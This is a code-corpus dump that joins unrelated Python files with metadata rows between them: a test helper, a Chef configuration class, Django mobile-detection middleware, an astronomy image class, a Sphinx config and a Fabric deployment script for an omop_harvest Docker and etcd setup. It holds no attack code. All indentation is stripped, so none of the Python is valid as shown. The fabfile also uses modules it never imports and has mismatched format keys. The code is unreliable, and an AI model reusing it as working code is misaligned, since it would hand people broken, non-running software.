def _run_all_project_tests(self):
self.test_basic_display_no_results()
self.test_basic_display_name_short()
self.test_basic_display_name_long()
self.test_basic_display_sum_single_line()
self.test_basic_display_sum_word_wrap()
self.test_basic_display_matches()
def tear_down(self, result, expected):
try:
assert result == expected
except AssertionError:
result = result.replace('\n', '\\n')
expected = expected.replace('\n', '\\n')
output = ('\nUnit test : {0}'.format(inspect.stack()[1][3]) +
'\nTerm width: {0}'.format(self.term_width) +
'\nResult : \n{0}\n'.format(result) +
'\nExpected : \n{0}'.format(expected))
print(output)
raise
| mit | 8,237,081,458,629,602,000 | 41.234146 | 79 | 0.57161 | false |
System25/gecosws-config-assistant | firstboot/serverconf/ChefConf.py | 1 | 3448 | # -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <[email protected]>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <[email protected]>"
__license__ = "GPL-2"
import firstboot.validation as validation
class ChefConf():
def __init__(self):
self._data = {}
self._data['chef_server_uri'] = ''
self._data['chef_validation'] = ''
self._data['chef_link'] = False
self._data['chef_link_existing'] = False
def load_data(self, conf):
msg = 'ServerConf: Key "%s" not found in the configuration file.'
try:
self.set_url(conf['chef_server_uri'])
except KeyError as e:
print msg % ('chef_server_uri',)
try:
self.set_pem(conf['chef_validation'])
except KeyError as e:
print msg % ('chef_validation',)
try:
self.set_chef_link(conf['chef_link'])
except KeyError as e:
print msg % ('chef_link',)
def validate(self):
valid = validation.is_url(self._data['chef_server_uri']) and self._data['chef_validation'] != '' and self._data['chef_link'] != None and self._data['chef_link_existing'] != None
return valid
def get_url(self):
return self._data['chef_server_uri'].encode('utf-8')
def set_url(self, url):
self._data['chef_server_uri'] = url
return self
def get_pem(self):
return self._data['chef_validation'].encode('utf-8')
def set_pem(self, pem):
self._data['chef_validation'] = pem
return self
# --- Next fields are not present in the JSON file but are
# setted on runtime by Firstboot ---
def set_chef_link_existing(self, link_existing):
self._data['chef_link_existing'] = link_existing
return self
def get_chef_link_existing(self):
return self._data['chef_link_existing']
def set_chef_link(self, chef_link):
self._data['chef_link'] = chef_link
return self
def get_chef_link(self):
return self._data['chef_link']
def get_node_name(self):
if not 'node_name' in self._data:
self._data['node_name'] = ''
return self._data['node_name'].encode('utf-8')
def set_node_name(self, node_name):
self._data['node_name'] = node_name
return self
def get_admin_name(self):
if not 'chef_admin_name' in self._data:
self._data['chef_admin_name'] = ''
return self._data['chef_admin_name'].encode('utf-8')
def set_admin_name(self, admin_name):
self._data['chef_admin_name'] = admin_name
return self
| gpl-2.0 | -7,859,253,604,361,442,000 | 32.784314 | 185 | 0.619269 | false |
tovmeod/anaf | minidetector/__init__.py | 1 | 2048 | from useragents import search_strings
class Middleware(object):
@staticmethod
def process_request(request):
"""Adds a "mobile" attribute to the request which is True or False
depending on whether the request should be considered to come from a
small-screen device such as a phone or a PDA"""
if "HTTP_X_OPERAMINI_FEATURES" in request.META:
# Then it's running opera mini. 'Nuff said.
# Reference from:
# http://dev.opera.com/articles/view/opera-mini-request-headers/
request.mobile = True
return None
if "HTTP_ACCEPT" in request.META:
s = request.META["HTTP_ACCEPT"].lower()
if 'application/vnd.wap.xhtml+xml' in s:
# Then it's a wap browser
request.mobile = True
return None
if "HTTP_USER_AGENT" in request.META:
# This takes the most processing. Surprisingly enough, when I
# Experimented on my own machine, this was the most efficient
# algorithm. Certainly more so than regexes.
# Also, Caching didn't help much, with real-world caches.
s = request.META["HTTP_USER_AGENT"].lower()
for ua in search_strings:
if ua in s:
request.mobile = True
return None
# Otherwise it's not a mobile
request.mobile = False
return None
def detect_mobile(view):
"""View Decorator that adds a "mobile" attribute to the request which is
True or False depending on whether the request should be considered
to come from a small-screen device such as a phone or a PDA"""
def detected(request, *args, **kwargs):
Middleware.process_request(request)
return view(request, *args, **kwargs)
detected.__doc__ = "{0!s}\n[Wrapped by detect_mobile which detects if the request is from a phone]".format(view.__doc__)
return detected
__all__ = ['Middleware', 'detect_mobile']
| bsd-3-clause | 6,936,481,703,161,349,000 | 36.925926 | 124 | 0.606445 | false |
AstroHuntsman/POCS | pocs/images.py | 1 | 7615 | import os
from astropy import units as u
from astropy import wcs
from astropy.coordinates import EarthLocation
from astropy.coordinates import FK5
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.time import Time
from collections import namedtuple
from . import PanBase
from .utils import images as img_utils
OffsetError = namedtuple('OffsetError', ['delta_ra', 'delta_dec', 'magnitude'])
class Image(PanBase):
def __init__(self, fits_file, wcs_file=None, location=None):
"""Object to represent a single image from a PANOPTES camera.
Args:
fits_file (str): Name of FITS file to be read (can be .fz)
wcs_file (str, optional): Name of FITS file to use for WCS
"""
super().__init__()
assert os.path.exists(fits_file), self.logger.warning(
'File does not exist: {}'.format(fits_file))
if fits_file.endswith('.fz'):
fits_file = img_utils.fpack(fits_file, unpack=True)
assert fits_file.lower().endswith(('.fits')), \
self.logger.warning('File must end with .fits')
self.wcs = None
self._wcs_file = None
self.fits_file = fits_file
if wcs_file is not None:
self.wcs_file = wcs_file
else:
self.wcs_file = fits_file
with fits.open(self.fits_file, 'readonly') as hdu:
self.header = hdu[0].header
assert 'DATE-OBS' in self.header, self.logger.warning(
'FITS file must contain the DATE-OBS keyword')
assert 'EXPTIME' in self.header, self.logger.warning(
'FITS file must contain the EXPTIME keyword')
# Location Information
if location is None:
cfg_loc = self.config['location']
location = EarthLocation(lat=cfg_loc['latitude'],
lon=cfg_loc['longitude'],
height=cfg_loc['elevation'],
)
# Time Information
self.starttime = Time(self.header['DATE-OBS'], location=location)
self.exptime = float(self.header['EXPTIME']) * u.second
self.midtime = self.starttime + (self.exptime / 2.0)
self.sidereal = self.midtime.sidereal_time('apparent')
self.FK5_Jnow = FK5(equinox=self.midtime)
# Coordinates from header keywords
self.header_pointing = None
self.header_ra = None
self.header_dec = None
self.header_ha = None
# Coordinates from WCS
self.pointing = None
self.ra = None
self.dec = None
self.ha = None
self.get_header_pointing()
self.get_wcs_pointing()
self._luminance = None
self._pointing = None
self._pointing_error = None
@property
def wcs_file(self):
"""WCS file name
When setting the WCS file name, the WCS information will be read,
setting the `wcs` property.
"""
return self._wcs_file
@wcs_file.setter
def wcs_file(self, filename):
if filename is not None:
try:
w = wcs.WCS(filename)
assert w.is_celestial
self.wcs = w
self._wcs_file = filename
except Exception:
self.logger.debug("Can't get WCS from FITS file (try solve_field)")
@property
def pointing_error(self):
"""Pointing error namedtuple (delta_ra, delta_dec, magnitude)
Returns pointing error information. The first time this is accessed
this will solve the field if not previously solved.
Returns:
namedtuple: Pointing error information
"""
if self._pointing_error is None:
assert self.pointing is not None, self.logger.warning(
"No world coordinate system (WCS), can't get pointing_error")
assert self.header_pointing is not None
if self.wcs is None:
self.solve_field()
mag = self.pointing.separation(self.header_pointing)
d_dec = self.pointing.dec - self.header_pointing.dec
d_ra = self.pointing.ra - self.header_pointing.ra
self._pointing_error = OffsetError(
d_ra.to(
u.arcsec), d_dec.to(
u.arcsec), mag.to(
u.arcsec))
return self._pointing_error
def get_header_pointing(self):
"""Get the pointing information from the header
The header should contain the `RA-MNT` and `DEC-MNT` keywords, from which
the header pointing coordinates are built.
"""
try:
self.header_pointing = SkyCoord(ra=float(self.header['RA-MNT']) * u.degree,
dec=float(self.header['DEC-MNT']) * u.degree)
self.header_ra = self.header_pointing.ra.to(u.hourangle)
self.header_dec = self.header_pointing.dec.to(u.degree)
# Precess to the current equinox otherwise the RA - LST method will be off.
self.header_ha = self.header_pointing.transform_to(
self.FK5_Jnow).ra.to(u.hourangle) - self.sidereal
except Exception as e:
self.logger.warning('Cannot get header pointing information: {}'.format(e))
def get_wcs_pointing(self):
"""Get the pointing information from the WCS
Builds the pointing coordinates from the plate-solved WCS. These will be
compared with the coordinates stored in the header.
"""
if self.wcs is not None:
ra = self.wcs.celestial.wcs.crval[0]
dec = self.wcs.celestial.wcs.crval[1]
self.pointing = SkyCoord(ra=ra * u.degree, dec=dec * u.degree)
self.ra = self.pointing.ra.to(u.hourangle)
self.dec = self.pointing.dec.to(u.degree)
# Precess to the current equinox otherwise the RA - LST method will be off.
self.ha = self.pointing.transform_to(self.FK5_Jnow).ra.to(u.hourangle) - self.sidereal
def solve_field(self, **kwargs):
""" Solve field and populate WCS information
Args:
**kwargs (dict): Options to be passed to `get_solve_field`
"""
solve_info = img_utils.get_solve_field(self.fits_file,
ra=self.header_pointing.ra.value,
dec=self.header_pointing.dec.value,
**kwargs)
self.wcs_file = solve_info['solved_fits_file']
self.get_wcs_pointing()
# Remove some fields
for header in ['COMMENT', 'HISTORY']:
try:
del solve_info[header]
except KeyError:
pass
return solve_info
def compute_offset(self, ref_image):
assert isinstance(ref_image, Image), self.logger.warning(
"Must pass an Image class for reference")
mag = self.pointing.separation(ref_image.pointing)
d_dec = self.pointing.dec - ref_image.pointing.dec
d_ra = self.pointing.ra - ref_image.pointing.ra
return OffsetError(d_ra.to(u.arcsec), d_dec.to(u.arcsec), mag.to(u.arcsec))
##################################################################################################
# Private Methods
##################################################################################################
def __str__(self):
return "{}: {}".format(self.fits_file, self.header_pointing)
| mit | -6,846,705,688,718,471,000 | 34.584112 | 98 | 0.562049 | false |
pombredanne/django-rest-assured | docs/source/conf.py | 1 | 8599 | # -*- coding: utf-8 -*-
#
# django-rest-assured documentation build configuration file, created by
# sphinx-quickstart on Fri Oct 24 10:48:27 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.pardir, os.path.pardir)))
from django.conf import settings
# mock the AUTH_USER_MODEL setting so that django imports won't break
settings.configure(AUTH_USER_MODEL='account.Accounts')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-rest-assured'
copyright = u'2014, Yehonatan Daniv'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-rest-assureddoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'django-rest-assured.tex', u'django-rest-assured Documentation',
u'Yehonatan Daniv', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-rest-assured', u'django-rest-assured Documentation',
[u'Yehonatan Daniv'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-rest-assured', u'django-rest-assured Documentation',
u'Yehonatan Daniv', 'django-rest-assured', 'Instantly test-cover your Django REST Framework based API.',
'testing'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
autodoc_member_order = 'bysource'
| bsd-2-clause | 9,114,272,420,712,339,000 | 30.966543 | 107 | 0.711362 | false |
chop-dbhi/omop_harvest | fabfile.py | 1 | 18855 | from __future__ import print_function, with_statement
import os
import sys
import stat
import json
import etcd
from functools import wraps
from fabric.api import *
from fabric.colors import red, yellow, white, green
from fabric.contrib.console import confirm
from fabric.contrib.files import exists
__doc__ = """\
Help Doc
"""
# A few setup steps and environment checks
curdir = os.path.dirname(os.path.abspath(__file__))
config_file = os.path.join(curdir, '.project_config.json')
try:
project_config = json.loads(open(config_file, 'r').read())
except:
project_config = {
"etcd_host": env.etcd_host,
"docker_registry":env.registry_host
}
hidden_output = []
try:
venv_wrap_path = os.environ['WORKON_HOME']
except KeyError:
venv_wrap_path = None
if venv_wrap_path and os.path.exists(os.path.join(venv_wrap_path, 'omop_harvest')):
full_env_path = os.path.join(venv_wrap_path, 'omop_harvest')
else:
full_env_path = os.path.abspath('..')
venv_wrap_path = None
def get_hosts_settings():
# TODO: Will probably have to retain this to support legacy deploy.
# Load all the host settings
try:
hosts = json.loads(open(config_file).read())['hosts']
except KeyError:
abort(red('Error: No host settings are defined in the project configuration'))
# Pop the default settings
# Pre-populated defaults
# for host in hosts:
# base = base_settings.copy()
# base.update(default_settings)
# print(hosts)
# base.update(hosts[host])
# hosts[host] = base
return hosts
# ** Decorators
def virtualenv(path, venv_wrap):
"Wraps a function and prefixes the call with the virtualenv active."
if path is None:
activate = None
else:
activate = os.path.join(path, 'bin/activate')
def decorator(func):
@wraps(func)
def inner(*args, **kwargs):
if venv_wrap:
with prefix('source /usr/local/bin/virtualenvwrapper.sh'):
with prefix('workon {0}'.format('omop_harvest')):
return func(*args, **kwargs)
elif path is not None and venv is None:
with prefix('source {0}'.format(activate)):
return func(*args, **kwargs)
else:
return func(*args, **kwargs)
return inner
return decorator
def host_context(func):
"Sets the context of the setting to the current host"
@wraps(func)
def decorator(*args, **kwargs):
hosts = get_hosts_settings()
with settings(**hosts[env.host]):
return func(*args, **kwargs)
return decorator
# ---------------------------------------------------------------
# Configuration Commands
# ---------------------------------------------------------------
def set_configuration(noinput=False):
'''
Takes the settings in .project_config.json file and writes them to the
appropriate etcd endpoint for this application.
ab set_configuration:noinput=True will not prompt for confirmation
'''
client = etcd.Client(host=project_config['etcd_host'])
config = json.loads(open('.project_config.json', 'r').read())
if noinput or confirm("Are you sure you want to upload your local settings?"):
client.write('/applications/omop_harvest/configuration', json.dumps(config))
def get_configuration(noinput=False):
'''
Retrieves the applications settings from etcd and generates a local settings file.
fab get_configuration:noinput=True will not prompt for confirmation
'''
client = etcd.Client(host=project_config['etcd_host'])
try:
etcd_config = client.read('/applications/omop_harvest/configuration')
except KeyError:
abort(red('Error: No host settings found on etcd'))
configuration = json.loads(etcd_config.value)
if configuration == {}:
print(red('Empty configuration found. Aborting'))
sys.exit(1)
# Establish the configuration locally
if noinput or confirm('Are you sure you want to overwrite your local settings?'):
f = open('.project_config.json', 'w')
f.write(json.dumps(configuration, indent=4, sort_keys=True))
f.close()
# ---------------------------------------------------------------
# Docker Commands
# ---------------------------------------------------------------
# TODO:
# - Continuous Integration. Automatic provisioning of services
def build_container(noinput=False):
# Check git status to make sure our build hash matches our git commit
index_status = local('git status --porcelain', capture=True)
if index_status != '':
abort('Please commit or stash any changes to git before building your container')
try:
get_configuration(noinput)
except:
if not confirm('Unable to retrieve configuration. Would you like to attempt to build this container with locally available settings?'):
sys.exit(1)
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
local('docker build -t omop_harvest-{0}:{1} .'.format(git_branch, git_hash))
def test_container():
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
#local('docker run -i -t -e APP_ENV=test omop_harvest-{0}:{1} test'.format(git_branch, git_hash))
#Temporary: Anticipating new version of ATI Template
local('docker run --link memcache:mc -d -p :8000 -e CID_ENV={0} -e APP_ENV={1} omop_harvest-{2}:{3} test'.format(
env.cid_env,
env.host,
git_branch,
git_hash)
)
#
def build_and_test():
build_container(noinput=True)
test_container()
# Remote Deployment Commands
def pull_repo():
local('docker pull {0}/omop_harvest-{1}'.format(project_config['docker_registry'], git_branch))
def push_to_repo():
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
try:
with hide('output'):
local("docker inspect --format='{{{{.id}}}}' omop_harvest-{0}:{1}".format(git_branch, git_hash))
except:
if confirm('Could not find most most recent container. Would you like to build it?'):
build_container()
local('docker tag omop_harvest-{0}:{1} {2}/omop_harvest-{0}:{1}'.format(git_branch, git_hash, project_config['docker_registry']))
local('docker tag omop_harvest-{0}:{1} {2}/omop_harvest-{0}:latest'.format(git_branch, git_hash, project_config['docker_registry']))
local('docker push {0}/omop_harvest-{1}'.format(project_config['docker_registry'], git_branch))
local('docker rmi -f {0}/omop_harvest-{1}:{2}'.format(project_config['docker_registry'], git_branch, git_hash))
@host_context
def deploy(commit='latest'):
run('docker pull {0}/omop_harvest-{1}:{2}'.format(project_config['docker_registry'], env.git_branch, commit))
#container = run('docker run -d -p :8000 -e APP_ENV={0} {1}/omop_harvest-{2}:{3} start'.format(
# env.host,
# project_config['docker_registry'],
# env.git_branch,
# commit)
#)
#Temporary: Anticipating new version of ATI Template
container = run('docker run --hostname=omop-harvest-{2}-{3} --link memcache:mc -d -p :8000 -e CID_ENV={4} -e APP_ENV={0} {1}/omop_harvest-{2}:{3} start'.format(
env.host,
project_config['docker_registry'],
env.git_branch,
commit,
env.cid_env)
)
#
port = run("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(container))
commit_msg = local('git --no-pager log --oneline -1', capture = True)
auth_token = project_config['hipchat']['auth_token']
deploy_msg = 'omop_harvest-{0}:{1} now deployed at http://{2}:{3} <a href="http://{2}:{3}">Open</a> <a href="http://{4}:4001/v2/keys/applications/omop_harvest/status">Status</a> -- {5}'.format(env.git_branch, commit, env.host_string, port, project_config['etcd_host'], commit_msg)
# Notifications
local('curl -d "room_id=529405&from=deployservice&color=yellow" --data-urlencode message="{deploy_msg}" https://cbmi.hipchat.com/v1/rooms/message?auth_token={auth_token}'.format(
deploy_msg=deploy_msg,
auth_token=auth_token
))
client = etcd.Client(host=project_config['etcd_host'])
client.write('/applications/omop_harvest/status/{0}/latest_commit'.format(env.git_branch), commit)
client.write('/applications/omop_harvest/status/{0}/latest_deploy'.format(env.git_branch), 'http://{0}:{1}'.format(env.host_string, port))
print(green('Now Running at http://{0}:{1}'.format(env.host_string, port)))
@host_context
def setup_env():
"Sets up the initial environment."
parent, project = os.path.split(env.path)
if not exists(parent):
run('mkdir -p {}}'.format(parent))
with cd(parent):
if not exists(project):
run('git clone {repo_url} {project}'.format(project=project, **env))
with cd(project):
run('git checkout {git_branch}'.format(**env))
run('git pull origin {git_branch}'.format(**env))
else:
with cd(project):
run('git checkout {git_branch}'.format(**env))
run('git pull origin {git_branch}'.format(**env))
# ---------------------------------------------------------------
# Template Bootstrap Hooks
# ---------------------------------------------------------------
@virtualenv(full_env_path, venv_wrap_path)
def harvest_bootstrap():
# Handle Settings Configuration
# TODO:
# Perhaps at this point we go out to etcd and
# find the relavent DB connection settings if
# they exist then we use those here... otherwise
# we fall back to the default sqlite stuff
print('Setup default configuration file')
with hide(*hidden_output):
local('mv .project_config.json.sample .project_config.json')
print('Make test script executable')
mode = stat.S_IMODE(os.stat('run-tests.sh').st_mode)
executable = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod('run-tests.sh', mode | executable)
# Sync DB
print(green('- Creating SQLiteDB.'))
with hide(*hidden_output):
local('./bin/manage.py syncdb --settings=omop_harvest.conf.local')
# Collect Static
print(green('- Collecting Static Files'))
with hide(*hidden_output):
local('./bin/manage.py collectstatic --noinput --settings=omop_harvest.conf.local')
# Migrations
print(green('- Run Migrations'))
with hide(*hidden_output):
local('./bin/manage.py migrate --noinput --settings=omop_harvest.conf.local')
# ---------------------------------------------------------------
# Testing and Continuous Integration Commands
# ---------------------------------------------------------------
def check_for_config(noinput):
if 'project_settings' not in project_config.keys():
if noinput or confirm(red("No configuration found. Would you like to download this applications configuration?")):
get_configuration(noinput=True)
def check_for_pg(database):
'''
Check the current Docker host for an existing instance of the specified
database. If found returns the container ID.
'''
with hide('output', 'running', 'warnings'), settings(warn_only=True):
res = local("docker ps -a | awk '/{0}/ {{ print $1 }}'".format(database), capture=True)
if res:
return res.split("\n")
else:
return None
def check_for_mc():
'''
Check the current Docker host for an existing instance of memcache. If
found returns the container ID.
'''
with hide('output', 'running', 'warnings'), settings(warn_only=True):
res = local("docker ps | awk '/memcache/ { print $1 }'", capture=True)
if res:
print(green('Found Memcache running at {0}'.format(res)))
return res.split("\n")
else:
return None
def test_setup(noinput=False):
'''
Examine the project for a proper configuration file.
Examine the existing environment for Harvest app's service dependencies
(Memcache, and Postgres). If they do not exists create them as containers,
build the application container and apply ETL command from the application
to the Postgres DB.
After the data load is complete, attach the application to the Postgres
container and to Memcache. Apply normal bootstrapping procedures (syncdb,
migrations, collectstatic) and load fixture container test user "cbmi" with
default password "chopchop"
'''
DB_CONTAINER_NAME = 'omop_harvest_test_db'
check_for_config(noinput)
dbs = check_for_pg(DB_CONTAINER_NAME)
if dbs:
if noinput or confirm(yellow('It looks like you might already have an instance running on this machine. Do you want to stop and remove the existing containers?')):
with hide('output', 'running'):
print(red('Stopping and removing associated Harvest application containers.'))
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker stop")
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker rm")
mc = check_for_mc()
if not mc:
with hide('output', 'running'):
print(green('Starting Memcached Container...'))
local("docker run -d --name memcache ehazlett/memcached")
with hide('output', 'running', 'warnings'):
# Spin up a fresh Postgres instance:
print(green('Starting Postgres Container...'))
pg_container = local('docker run -p :5432 -d --name omop_harvest_test_db {registry_host}:5000/postgresql'.format(hosts=project_config['registry_host']), capture=True)
port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(pg_container), capture=True)
time.sleep(2)
# Create DB and User in fresh DB
print(green('Prepare Postgres DB...'))
local('export PGPASSWORD=docker && createdb -h localhost -p {port} -U docker omop_harvest'.format(port=port))
conn = psycopg2.connect(host='localhost', port=port, user='docker', password='docker', database='postgres')
conn.cursor().execute("create user omop_harvest with password 'docker'; ")
conn.commit()
conn.close()
# Build the Application Container to facilitate ETL:
print(green('Building Application Container...'))
local('docker build -t omop_harvest_test .')
# Run ETL on attached Postgres DB
print(green('Start ETL on attached DB'))
local('docker run --link omop_harvest_test_db:db -e APP_ENV=test --name omop_harvest_etl omop_harvest_test etl')
# Wait for ETL process to finish
local('docker wait omop_harvest_etl')
print(green('ETL Complete.'))
local('docker rm omop_harvest_etl')
# Start the application container
print(green('Start Application Container...'))
omop_harvest = local('docker run -d --link omop_harvest_test_db:db --link memcache:mc -p :8000 -e APP_ENV=test --name omop_harvest_test_app omop_harvest_test debug', capture=True)
omop_harvest_port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(omop_harvest), capture=True)
# Sleep to give syncdb and migrations time to run.
time.sleep(10)
print(red('\n***\nomop_harvest Test Instance now running on: http://{0}:{1}'.format(socket.gethostname(), omop_harvest_port)))
def ci_setup(noinput=False):
"Copy down the production omop_harvest database to a fresh postgres container."
# TODO
# - Make sure configuration file exists.
DB_CONTAINER_NAME = 'omop_harvest_ci_pg'
check_for_config(noinput)
dbs = check_for_pg(DB_CONTAINER_NAME)
if dbs:
if noinput or confirm(yellow('It looks like you might already have an instance running on this machine. Do you want to stop and remove the existing containers?')):
with hide('output', 'running'):
print(red('Stopping and removing associated Harvest application containers.'))
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker stop")
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker rm")
# Spin up a fresh postgres instance:
with hide('output', 'running', 'warnings'):
print(green('Starting Postgres Container...'))
pg_container = local('docker run -p :5432 -d --name omop_harvest_ci_db {registry_host}:5000/postgresql'.format(hosts=project_config['registry_host']), capture=True)
port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(pg_container), capture=True)
time.sleep(2)
print(green('Dump Production DB...'))
db = parse_db(project_config['project_settings']['production']['databases']['default'])
local('export PGPASSWORD={password} && pg_dump -h {host} -U {user} -Fc {database} > tmp.dump'.format(**db))
time.sleep(2)
print(green('Prepare Postgres DB...'))
local('export PGPASSWORD=docker && createdb -h localhost -p {port} -U docker omop_harvest'.format(port=port))
conn = psycopg2.connect(host='localhost', port=port, user='docker', password='docker', database='postgres')
conn.cursor().execute("create user omop_harvest with password 'docker'; ")
conn.commit()
conn.close()
print(green('Restoring Backup to Container...'))
local('export PGPASSWORD=docker && pg_restore -h localhost -p {port} -U docker -d omop_harvest tmp.dump'.format(port=port))
local('rm tmp.dump')
print(green('Building Application Container...'))
local('docker build -t omop_harvest_test .')
print(green('Start Application Container...'))
omop_harvest = local('docker run -d --link omop_harvest_ci_db:db -p :8000 -e APP_ENV=ci --name omop_harvest_ci omop_harvest start', capture=True)
omop_harvest_port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(omop_harvest), capture=True)
